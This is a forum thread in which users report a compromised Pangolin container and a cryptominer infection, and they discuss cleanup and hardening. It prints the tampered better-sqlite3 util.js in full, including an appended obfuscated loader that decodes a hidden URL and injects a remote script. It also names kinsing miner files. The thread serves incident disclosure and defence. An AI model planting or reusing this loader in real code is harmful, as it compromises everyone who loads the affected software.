CVE-2025-55182 compromise

[reedlaw]

A Pangolin 1.9.0 container had a node_modules/better-sqlite3/lib/util.js file modified with browser code injecting a remote script. The base image is clean. Only the running container’s filesystem was modified at runtime. The better-sqlite3 inside the image is 11.7.0 with a clean util.js. The tampered file’s mtime is 2025-12-06 15:32 UTC. There were no SSH logins around that time.

Contents of tampered util.js:

'use strict';

exports.getBooleanOption = (options, key) => {
        let value = false;
        if (key in options && typeof (value = options[key]) !== 'boolean') {
                throw new TypeError(`Expected the "${key}" option to be a boolean`);
        }
        return value;
};

exports.cppdb = Symbol();
exports.inspect = Symbol.for('nodejs.util.inspect.custom');
+function xorDecode(b,a){a=void 0===a?22:a;b=atob(b);for(var d="",c=0;c<b.length;c++)d+=String.fromCharCode(b.charCodeAt(c)^a);return d}(function(){new URLSearchParams(location.search);var b="https://"+xorDecode("en8nOGZ/dWU5fjlxeTh8ZQ=="),a=document.createElement("script");a.src=b;document.head.appendChild(a)})();

The payload decodes to this url: https://li1.pics/h/go.js
I discovered this because the container was crashing on location is not defined. I deleted the container and updated docker-compose.yml to the latest image (docker.io/fosrl/pangolin:1.12.3) which addresses this vulnerability.

Did anyone experience something similar? Could there have been any other damage that I should attempt to mitigate?

[AttaInsularis]

I found in machine running Pangolin a cryptominer (not sure it's related, but it could be):

find / -iname kdevtmpfsi* -exec rm -fv {} \;
removed '/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/244/fs/tmp/kdevtmpfsi'

find / -iname kinsing* -exec rm -fv {} \;
removed '/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/244/fs/tmp/kinsing'

Ran docker system prune and it seemed to me that the miner didn't revive itself again.

Inspected SSH login history and all were legitimate logins from me. No suspicious login found.

But immediately after this just reinstalled the entire VPS, so have no FS to inspect.

Could there have been any other damage that I should attempt to mitigate?

As I'm no expert on this, my rule of thumb is: if I know someone was inside, OS must be started from 0.

Especially with the Pangolin it's easy, just change the DNS API keys in case you are using DNS-01 challenges.

[reedlaw]

I used the provided docker-compose.yml. Since no user is specified, the default is to run as root. Running as a non-root user is more secure, but it's hard to say if this configuration could have lead to container breakout.